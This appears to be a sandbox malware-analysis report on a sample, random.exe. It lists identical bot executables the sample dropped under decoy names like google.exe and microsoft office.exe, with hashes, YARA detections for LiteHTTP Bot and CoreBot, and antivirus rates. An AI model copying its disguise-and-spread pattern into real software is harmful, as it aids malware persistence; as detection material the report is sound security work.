                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....g..............0.................. ........@.. ....................................`.................................<...O.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................p.......H........W...O...........................................................0..8.......s=.....(....}......}......}.....|......(...+.|....(....*.0..r........(.....(.......(.....(.....(....-.r...p+.r...p.(.....(......(.........J...%.r...p.%..(/....%.r...p.%..(/....%.r)..p.%..(/....%.r3..p.%..(/....%.r=..p.%....(/....%..rG..p.%....(/....%..rQ..p.%..~....(/....%..r[..p.%..~....(/....(......~......(....(0.......re..p(........,..rm..p(......J.....r...po........9.........L...%..:.o ...

                          C:\Users\user\AppData\Roaming\random.exe:Zone.Identifier

                          Download File
                          Process:C:\Users\user\Desktop\random.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):26
                          Entropy (8bit):3.95006375643621
                          Encrypted:false
                          SSDEEP:3:ggPYV:rPYV
                          MD5:187F488E27DB4AF347237FE461A079AD
                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                          Malicious:true
                          Preview:[ZoneTransfer]....ZoneId=0

                          C:\Users\user\OneDrive\autoit3.exe

                          Download File
                          Process:C:\Users\user\Desktop\random.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):38400
                          Entropy (8bit):5.495343186946422
                          Encrypted:false
                          SSDEEP:768:XL5VwLMjxZRdazKglRzlllllllFIEDGGFbd4m60/c11UhOo:b5eg1ZRdazKglRzlllllllFVGGFbWQGK
                          MD5:E2E13615DFFAFF99A1D0CD9D32C4CF80
                          SHA1:6B804AAD52F0DFDA2303DDE5C0E641BB20F14FC2
                          SHA-256:71CFDBE5A32FB5CB2A5EFF926C8B9000B231F4990B258872E7CF3A0E4C46BCCF
                          SHA-512:8A331CE713F81BC3050E80CBCA8D6E305EDE44E28684DBCA4E59C2E5FF7D0A05AD50F65DC4D2258FA64110030EC4F9ACBCF5D3E6BA273345BE4FB00C6016EB35
                          Malicious:true
                          Yara Hits:
                          • Rule: JoeSecurity_LiteHTTPBot, Description: Yara detected LiteHTTP Bot, Source: C:\Users\user\OneDrive\autoit3.exe, Author: Joe Security
                          • Rule: MALWARE_Win_CoreBot, Description: Detects CoreBot, Source: C:\Users\user\OneDrive\autoit3.exe, Author: ditekSHen
                          Antivirus:
                          • Antivirus: Avira, Detection: 100%
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          • Antivirus: ReversingLabs, Detection: 21%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....g..............0.................. ........@.. ....................................`.................................<...O.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................p.......H........W...O...........................................................0..8.......s=.....(....}......}......}.....|......(...+.|....(....*.0..r........(.....(.......(.....(.....(....-.r...p+.r...p.(.....(......(.........J...%.r...p.%..(/....%.r...p.%..(/....%.r)..p.%..(/....%.r3..p.%..(/....%.r=..p.%....(/....%..rG..p.%....(/....%..rQ..p.%..~....(/....%..r[..p.%..~....(/....(......~......(....(0.......re..p(........,..rm..p(......J.....r...po........9.........L...%..:.o ...

                          C:\Users\user\OneDrive\autoit3.exe:Zone.Identifier

                          Download File
                          Process:C:\Users\user\Desktop\random.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):26
                          Entropy (8bit):3.95006375643621
                          Encrypted:false
                          SSDEEP:3:ggPYV:rPYV
                          MD5:187F488E27DB4AF347237FE461A079AD
                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                          Malicious:true
                          Preview:[ZoneTransfer]....ZoneId=0

                          C:\Users\user\OneDrive\common files.exe

                          Download File
                          Process:C:\Users\user\Desktop\random.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):38400
                          Entropy (8bit):5.495343186946422
                          Encrypted:false
                          SSDEEP:768:XL5VwLMjxZRdazKglRzlllllllFIEDGGFbd4m60/c11UhOo:b5eg1ZRdazKglRzlllllllFVGGFbWQGK
                          MD5:E2E13615DFFAFF99A1D0CD9D32C4CF80
                          SHA1:6B804AAD52F0DFDA2303DDE5C0E641BB20F14FC2
                          SHA-256:71CFDBE5A32FB5CB2A5EFF926C8B9000B231F4990B258872E7CF3A0E4C46BCCF
                          SHA-512:8A331CE713F81BC3050E80CBCA8D6E305EDE44E28684DBCA4E59C2E5FF7D0A05AD50F65DC4D2258FA64110030EC4F9ACBCF5D3E6BA273345BE4FB00C6016EB35
                          Malicious:true
                          Yara Hits:
                          • Rule: JoeSecurity_LiteHTTPBot, Description: Yara detected LiteHTTP Bot, Source: C:\Users\user\OneDrive\common files.exe, Author: Joe Security
                          • Rule: MALWARE_Win_CoreBot, Description: Detects CoreBot, Source: C:\Users\user\OneDrive\common files.exe, Author: ditekSHen
                          Antivirus:
                          • Antivirus: Avira, Detection: 100%
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          • Antivirus: ReversingLabs, Detection: 21%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....g..............0.................. ........@.. ....................................`.................................<...O.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................p.......H........W...O...........................................................0..8.......s=.....(....}......}......}.....|......(...+.|....(....*.0..r........(.....(.......(.....(.....(....-.r...p+.r...p.(.....(......(.........J...%.r...p.%..(/....%.r...p.%..(/....%.r)..p.%..(/....%.r3..p.%..(/....%.r=..p.%....(/....%..rG..p.%....(/....%..rQ..p.%..~....(/....%..r[..p.%..~....(/....(......~......(....(0.......re..p(........,..rm..p(......J.....r...po........9.........L...%..:.o ...

                          C:\Users\user\OneDrive\common files.exe:Zone.Identifier

                          Download File
                          Process:C:\Users\user\Desktop\random.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):26
                          Entropy (8bit):3.95006375643621
                          Encrypted:false
                          SSDEEP:3:ggPYV:rPYV
                          MD5:187F488E27DB4AF347237FE461A079AD
                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                          Malicious:true
                          Preview:[ZoneTransfer]....ZoneId=0

                          C:\Users\user\OneDrive\google.exe

                          Download File
                          Process:C:\Users\user\Desktop\random.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):38400
                          Entropy (8bit):5.495343186946422
                          Encrypted:false
                          SSDEEP:768:XL5VwLMjxZRdazKglRzlllllllFIEDGGFbd4m60/c11UhOo:b5eg1ZRdazKglRzlllllllFVGGFbWQGK
                          MD5:E2E13615DFFAFF99A1D0CD9D32C4CF80
                          SHA1:6B804AAD52F0DFDA2303DDE5C0E641BB20F14FC2
                          SHA-256:71CFDBE5A32FB5CB2A5EFF926C8B9000B231F4990B258872E7CF3A0E4C46BCCF
                          SHA-512:8A331CE713F81BC3050E80CBCA8D6E305EDE44E28684DBCA4E59C2E5FF7D0A05AD50F65DC4D2258FA64110030EC4F9ACBCF5D3E6BA273345BE4FB00C6016EB35
                          Malicious:true
                          Yara Hits:
                          • Rule: JoeSecurity_LiteHTTPBot, Description: Yara detected LiteHTTP Bot, Source: C:\Users\user\OneDrive\google.exe, Author: Joe Security
                          • Rule: MALWARE_Win_CoreBot, Description: Detects CoreBot, Source: C:\Users\user\OneDrive\google.exe, Author: ditekSHen
                          Antivirus:
                          • Antivirus: Avira, Detection: 100%
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          • Antivirus: ReversingLabs, Detection: 21%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....g..............0.................. ........@.. ....................................`.................................<...O.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................p.......H........W...O...........................................................0..8.......s=.....(....}......}......}.....|......(...+.|....(....*.0..r........(.....(.......(.....(.....(....-.r...p+.r...p.(.....(......(.........J...%.r...p.%..(/....%.r...p.%..(/....%.r)..p.%..(/....%.r3..p.%..(/....%.r=..p.%....(/....%..rG..p.%....(/....%..rQ..p.%..~....(/....%..r[..p.%..~....(/....(......~......(....(0.......re..p(........,..rm..p(......J.....r...po........9.........L...%..:.o ...

                          C:\Users\user\OneDrive\google.exe:Zone.Identifier

                          Download File
                          Process:C:\Users\user\Desktop\random.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):26
                          Entropy (8bit):3.95006375643621
                          Encrypted:false
                          SSDEEP:3:ggPYV:rPYV
                          MD5:187F488E27DB4AF347237FE461A079AD
                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                          Malicious:true
                          Preview:[ZoneTransfer]....ZoneId=0

                          C:\Users\user\OneDrive\internet explorer.exe

                          Download File
                          Process:C:\Users\user\Desktop\random.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):38400
                          Entropy (8bit):5.495343186946422
                          Encrypted:false
                          SSDEEP:768:XL5VwLMjxZRdazKglRzlllllllFIEDGGFbd4m60/c11UhOo:b5eg1ZRdazKglRzlllllllFVGGFbWQGK
                          MD5:E2E13615DFFAFF99A1D0CD9D32C4CF80
                          SHA1:6B804AAD52F0DFDA2303DDE5C0E641BB20F14FC2
                          SHA-256:71CFDBE5A32FB5CB2A5EFF926C8B9000B231F4990B258872E7CF3A0E4C46BCCF
                          SHA-512:8A331CE713F81BC3050E80CBCA8D6E305EDE44E28684DBCA4E59C2E5FF7D0A05AD50F65DC4D2258FA64110030EC4F9ACBCF5D3E6BA273345BE4FB00C6016EB35
                          Malicious:true
                          Yara Hits:
                          • Rule: JoeSecurity_LiteHTTPBot, Description: Yara detected LiteHTTP Bot, Source: C:\Users\user\OneDrive\internet explorer.exe, Author: Joe Security
                          • Rule: MALWARE_Win_CoreBot, Description: Detects CoreBot, Source: C:\Users\user\OneDrive\internet explorer.exe, Author: ditekSHen
                          Antivirus:
                          • Antivirus: Avira, Detection: 100%
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          • Antivirus: ReversingLabs, Detection: 21%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....g..............0.................. ........@.. ....................................`.................................<...O.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................p.......H........W...O...........................................................0..8.......s=.....(....}......}......}.....|......(...+.|....(....*.0..r........(.....(.......(.....(.....(....-.r...p+.r...p.(.....(......(.........J...%.r...p.%..(/....%.r...p.%..(/....%.r)..p.%..(/....%.r3..p.%..(/....%.r=..p.%....(/....%..rG..p.%....(/....%..rQ..p.%..~....(/....%..r[..p.%..~....(/....(......~......(....(0.......re..p(........,..rm..p(......J.....r...po........9.........L...%..:.o ...

                          C:\Users\user\OneDrive\internet explorer.exe:Zone.Identifier

                          Download File
                          Process:C:\Users\user\Desktop\random.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):26
                          Entropy (8bit):3.95006375643621
                          Encrypted:false
                          SSDEEP:3:ggPYV:rPYV
                          MD5:187F488E27DB4AF347237FE461A079AD
                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                          Malicious:true
                          Preview:[ZoneTransfer]....ZoneId=0

                          C:\Users\user\OneDrive\java.exe

                          Download File
                          Process:C:\Users\user\Desktop\random.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):38400
                          Entropy (8bit):5.495343186946422
                          Encrypted:false
                          SSDEEP:768:XL5VwLMjxZRdazKglRzlllllllFIEDGGFbd4m60/c11UhOo:b5eg1ZRdazKglRzlllllllFVGGFbWQGK
                          MD5:E2E13615DFFAFF99A1D0CD9D32C4CF80
                          SHA1:6B804AAD52F0DFDA2303DDE5C0E641BB20F14FC2
                          SHA-256:71CFDBE5A32FB5CB2A5EFF926C8B9000B231F4990B258872E7CF3A0E4C46BCCF
                          SHA-512:8A331CE713F81BC3050E80CBCA8D6E305EDE44E28684DBCA4E59C2E5FF7D0A05AD50F65DC4D2258FA64110030EC4F9ACBCF5D3E6BA273345BE4FB00C6016EB35
                          Malicious:true
                          Yara Hits:
                          • Rule: JoeSecurity_LiteHTTPBot, Description: Yara detected LiteHTTP Bot, Source: C:\Users\user\OneDrive\java.exe, Author: Joe Security
                          • Rule: MALWARE_Win_CoreBot, Description: Detects CoreBot, Source: C:\Users\user\OneDrive\java.exe, Author: ditekSHen
                          Antivirus:
                          • Antivirus: Avira, Detection: 100%
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          • Antivirus: ReversingLabs, Detection: 21%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....g..............0.................. ........@.. ....................................`.................................<...O.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................p.......H........W...O...........................................................0..8.......s=.....(....}......}......}.....|......(...+.|....(....*.0..r........(.....(.......(.....(.....(....-.r...p+.r...p.(.....(......(.........J...%.r...p.%..(/....%.r...p.%..(/....%.r)..p.%..(/....%.r3..p.%..(/....%.r=..p.%....(/....%..rG..p.%....(/....%..rQ..p.%..~....(/....%..r[..p.%..~....(/....(......~......(....(0.......re..p(........,..rm..p(......J.....r...po........9.........L...%..:.o ...

                          C:\Users\user\OneDrive\java.exe:Zone.Identifier

                          Download File
                          Process:C:\Users\user\Desktop\random.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):26
                          Entropy (8bit):3.95006375643621
                          Encrypted:false
                          SSDEEP:3:ggPYV:rPYV
                          MD5:187F488E27DB4AF347237FE461A079AD
                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                          Malicious:true
                          Preview:[ZoneTransfer]....ZoneId=0

                          C:\Users\user\OneDrive\jdownloader.exe

                          Download File
                          Process:C:\Users\user\Desktop\random.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):38400
                          Entropy (8bit):5.495343186946422
                          Encrypted:false
                          SSDEEP:768:XL5VwLMjxZRdazKglRzlllllllFIEDGGFbd4m60/c11UhOo:b5eg1ZRdazKglRzlllllllFVGGFbWQGK
                          MD5:E2E13615DFFAFF99A1D0CD9D32C4CF80
                          SHA1:6B804AAD52F0DFDA2303DDE5C0E641BB20F14FC2
                          SHA-256:71CFDBE5A32FB5CB2A5EFF926C8B9000B231F4990B258872E7CF3A0E4C46BCCF
                          SHA-512:8A331CE713F81BC3050E80CBCA8D6E305EDE44E28684DBCA4E59C2E5FF7D0A05AD50F65DC4D2258FA64110030EC4F9ACBCF5D3E6BA273345BE4FB00C6016EB35
                          Malicious:true
                          Yara Hits:
                          • Rule: JoeSecurity_LiteHTTPBot, Description: Yara detected LiteHTTP Bot, Source: C:\Users\user\OneDrive\jdownloader.exe, Author: Joe Security
                          • Rule: MALWARE_Win_CoreBot, Description: Detects CoreBot, Source: C:\Users\user\OneDrive\jdownloader.exe, Author: ditekSHen
                          Antivirus:
                          • Antivirus: Avira, Detection: 100%
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          • Antivirus: ReversingLabs, Detection: 21%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....g..............0.................. ........@.. ....................................`.................................<...O.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................p.......H........W...O...........................................................0..8.......s=.....(....}......}......}.....|......(...+.|....(....*.0..r........(.....(.......(.....(.....(....-.r...p+.r...p.(.....(......(.........J...%.r...p.%..(/....%.r...p.%..(/....%.r)..p.%..(/....%.r3..p.%..(/....%.r=..p.%....(/....%..rG..p.%....(/....%..rQ..p.%..~....(/....%..r[..p.%..~....(/....(......~......(....(0.......re..p(........,..rm..p(......J.....r...po........9.........L...%..:.o ...

                          C:\Users\user\OneDrive\jdownloader.exe:Zone.Identifier

                          Download File
                          Process:C:\Users\user\Desktop\random.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):26
                          Entropy (8bit):3.95006375643621
                          Encrypted:false
                          SSDEEP:3:ggPYV:rPYV
                          MD5:187F488E27DB4AF347237FE461A079AD
                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                          Malicious:true
                          Preview:[ZoneTransfer]....ZoneId=0

                          C:\Users\user\OneDrive\microsoft office.exe

                          Download File
                          Process:C:\Users\user\Desktop\random.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):38400
                          Entropy (8bit):5.495343186946422
                          Encrypted:false
                          SSDEEP:768:XL5VwLMjxZRdazKglRzlllllllFIEDGGFbd4m60/c11UhOo:b5eg1ZRdazKglRzlllllllFVGGFbWQGK
                          MD5:E2E13615DFFAFF99A1D0CD9D32C4CF80
                          SHA1:6B804AAD52F0DFDA2303DDE5C0E641BB20F14FC2
                          SHA-256:71CFDBE5A32FB5CB2A5EFF926C8B9000B231F4990B258872E7CF3A0E4C46BCCF
                          SHA-512:8A331CE713F81BC3050E80CBCA8D6E305EDE44E28684DBCA4E59C2E5FF7D0A05AD50F65DC4D2258FA64110030EC4F9ACBCF5D3E6BA273345BE4FB00C6016EB35
                          Malicious:true
                          Yara Hits:
                          • Rule: JoeSecurity_LiteHTTPBot, Description: Yara detected LiteHTTP Bot, Source: C:\Users\user\OneDrive\microsoft office.exe, Author: Joe Security
                          • Rule: MALWARE_Win_CoreBot, Description: Detects CoreBot, Source: C:\Users\user\OneDrive\microsoft office.exe, Author: ditekSHen
                          Antivirus:
                          • Antivirus: Avira, Detection: 100%
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          • Antivirus: ReversingLabs, Detection: 21%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....g..............0.................. ........@.. ....................................`.................................<...O.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................p.......H........W...O...........................................................0..8.......s=.....(....}......}......}.....|......(...+.|....(....*.0..r........(.....(.......(.....(.....(....-.r...p+.r...p.(.....(......(.........J...%.r...p.%..(/....%.r...p.%..(/....%.r)..p.%..(/....%.r3..p.%..(/....%.r=..p.%....(/....%..rG..p.%....(/....%..rQ..p.%..~....(/....%..r[..p.%..~....(/....(......~......(....(0.......re..p(........,..rm..p(......J.....r...po........9.........L...%..:.o ...

                          C:\Users\user\OneDrive\microsoft office.exe:Zone.Identifier

                          Download File
                          Process:C:\Users\user\Desktop\random.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):26
                          Entropy (8bit):3.95006375643621
                          Encrypted:false
                          SSDEEP:3:ggPYV:rPYV
                          MD5:187F488E27DB4AF347237FE461A079AD
                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                          Malicious:true
                          Preview:[ZoneTransfer]....ZoneId=0

                          C:\Users\user\OneDrive\microsoft.exe

                          Download File
                          Process:C:\Users\user\Desktop\random.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):38400
                          Entropy (8bit):5.495343186946422
                          Encrypted:false
                          SSDEEP:768:XL5VwLMjxZRdazKglRzlllllllFIEDGGFbd4m60/c11UhOo:b5eg1ZRdazKglRzlllllllFVGGFbWQGK
                          MD5:E2E13615DFFAFF99A1D0CD9D32C4CF80
                          SHA1:6B804AAD52F0DFDA2303DDE5C0E641BB20F14FC2
                          SHA-256:71CFDBE5A32FB5CB2A5EFF926C8B9000B231F4990B258872E7CF3A0E4C46BCCF
                          SHA-512:8A331CE713F81BC3050E80CBCA8D6E305EDE44E28684DBCA4E59C2E5FF7D0A05AD50F65DC4D2258FA64110030EC4F9ACBCF5D3E6BA273345BE4FB00C6016EB35
                          Malicious:true
                          Yara Hits:
                          • Rule: JoeSecurity_LiteHTTPBot, Description: Yara detected LiteHTTP Bot, Source: C:\Users\user\OneDrive\microsoft.exe, Author: Joe Security
                          • Rule: MALWARE_Win_CoreBot, Description: Detects CoreBot, Source: C:\Users\user\OneDrive\microsoft.exe, Author: ditekSHen
                          Antivirus:
                          • Antivirus: Avira, Detection: 100%
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          • Antivirus: ReversingLabs, Detection: 21%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....g..............0.................. ........@.. ....................................`.................................<...O.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................p.......H........W...O...........................................................0..8.......s=.....(....}......}......}.....|......(...+.|....(....*.0..r........(.....(.......(.....(.....(....-.r...p+.r...p.(.....(......(.........J...%.r...p.%..(/....%.r...p.%..(/....%.r)..p.%..(/....%.r3..p.%..(/....%.r=..p.%....(/....%..rG..p.%....(/....%..rQ..p.%..~....(/....%..r[..p.%..~....(/....(......~......(....(0.......re..p(........,..rm..p(......J.....r...po........9.........L...%..:.o ...

                          C:\Users\user\OneDrive\microsoft.exe:Zone.Identifier

                          Download File
                          Process:C:\Users\user\Desktop\random.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):26
                          Entropy (8bit):3.95006375643621
                          Encrypted:false
                          SSDEEP:3:ggPYV:rPYV
                          MD5:187F488E27DB4AF347237FE461A079AD
                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                          Malicious:true
                          Preview:[ZoneTransfer]....ZoneId=0

                          C:\Users\user\OneDrive\microsoft.net.exe

                          Download File
                          Process:C:\Users\user\Desktop\random.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):38400
                          Entropy (8bit):5.495343186946422
                          Encrypted:false
                          SSDEEP:768:XL5VwLMjxZRdazKglRzlllllllFIEDGGFbd4m60/c11UhOo:b5eg1ZRdazKglRzlllllllFVGGFbWQGK
                          MD5:E2E13615DFFAFF99A1D0CD9D32C4CF80
                          SHA1:6B804AAD52F0DFDA2303DDE5C0E641BB20F14FC2
                          SHA-256:71CFDBE5A32FB5CB2A5EFF926C8B9000B231F4990B258872E7CF3A0E4C46BCCF
                          SHA-512:8A331CE713F81BC3050E80CBCA8D6E305EDE44E28684DBCA4E59C2E5FF7D0A05AD50F65DC4D2258FA64110030EC4F9ACBCF5D3E6BA273345BE4FB00C6016EB35
                          Malicious:true
                          Yara Hits:
                          • Rule: JoeSecurity_LiteHTTPBot, Description: Yara detected LiteHTTP Bot, Source: C:\Users\user\OneDrive\microsoft.net.exe, Author: Joe Security
                          • Rule: MALWARE_Win_CoreBot, Description: Detects CoreBot, Source: C:\Users\user\OneDrive\microsoft.net.exe, Author: ditekSHen
                          Antivirus:
                          • Antivirus: Avira, Detection: 100%
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          • Antivirus: ReversingLabs, Detection: 21%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....g..............0.................. ........@.. ....................................`.................................<...O.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................p.......H........W...O...........................................................0..8.......s=.....(....}......}......}.....|......(...+.|....(....*.0..r........(.....(.......(.....(.....(....-.r...p+.r...p.(.....(......(.........J...%.r...p.%..(/....%.r...p.%..(/....%.r)..p.%..(/....%.r3..p.%..(/....%.r=..p.%....(/....%..rG..p.%....(/....%..rQ..p.%..~....(/....%..r[..p.%..~....(/....(......~......(....(0.......re..p(........,..rm..p(......J.....r...po........9.........L...%..:.o ...

                          C:\Users\user\OneDrive\microsoft.net.exe:Zone.Identifier

                          Download File
                          Process:C:\Users\user\Desktop\random.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):26
                          Entropy (8bit):3.95006375643621
                          Encrypted:false
                          SSDEEP:3:ggPYV:rPYV
                          MD5:187F488E27DB4AF347237FE461A079AD
                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                          Malicious:true
                          Preview:[ZoneTransfer]....ZoneId=0

                          C:\Users\user\OneDrive\mmzjdoevgizobizuwenrntjysakvaaofwgwplryd.exe

                          Download File
                          Process:C:\Users\user\Desktop\random.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):38400
                          Entropy (8bit):5.495343186946422
                          Encrypted:false
                          SSDEEP:768:XL5VwLMjxZRdazKglRzlllllllFIEDGGFbd4m60/c11UhOo:b5eg1ZRdazKglRzlllllllFVGGFbWQGK
                          MD5:E2E13615DFFAFF99A1D0CD9D32C4CF80
                          SHA1:6B804AAD52F0DFDA2303DDE5C0E641BB20F14FC2
                          SHA-256:71CFDBE5A32FB5CB2A5EFF926C8B9000B231F4990B258872E7CF3A0E4C46BCCF
                          SHA-512:8A331CE713F81BC3050E80CBCA8D6E305EDE44E28684DBCA4E59C2E5FF7D0A05AD50F65DC4D2258FA64110030EC4F9ACBCF5D3E6BA273345BE4FB00C6016EB35
                          Malicious:true
                          Yara Hits:
                          • Rule: JoeSecurity_LiteHTTPBot, Description: Yara detected LiteHTTP Bot, Source: C:\Users\user\OneDrive\mmzjdoevgizobizuwenrntjysakvaaofwgwplryd.exe, Author: Joe Security
                          • Rule: MALWARE_Win_CoreBot, Description: Detects CoreBot, Source: C:\Users\user\OneDrive\mmzjdoevgizobizuwenrntjysakvaaofwgwplryd.exe, Author: ditekSHen
                          Antivirus:
                          • Antivirus: Avira, Detection: 100%
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          • Antivirus: ReversingLabs, Detection: 21%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....g..............0.................. ........@.. ....................................`.................................<...O.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................p.......H........W...O...........................................................0..8.......s=.....(....}......}......}.....|......(...+.|....(....*.0..r........(.....(.......(.....(.....(....-.r...p+.r...p.(.....(......(.........J...%.r...p.%..(/....%.r...p.%..(/....%.r)..p.%..(/....%.r3..p.%..(/....%.r=..p.%....(/....%..rG..p.%....(/....%..rQ..p.%..~....(/....%..r[..p.%..~....(/....(......~......(....(0.......re..p(........,..rm..p(......J.....r...po........9.........L...%..:.o ...

                          C:\Users\user\OneDrive\mmzjdoevgizobizuwenrntjysakvaaofwgwplryd.exe:Zone.Identifier

                          Download File
                          Process:C:\Users\user\Desktop\random.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):26
                          Entropy (8bit):3.95006375643621
                          Encrypted:false
                          SSDEEP:3:ggPYV:rPYV
                          MD5:187F488E27DB4AF347237FE461A079AD
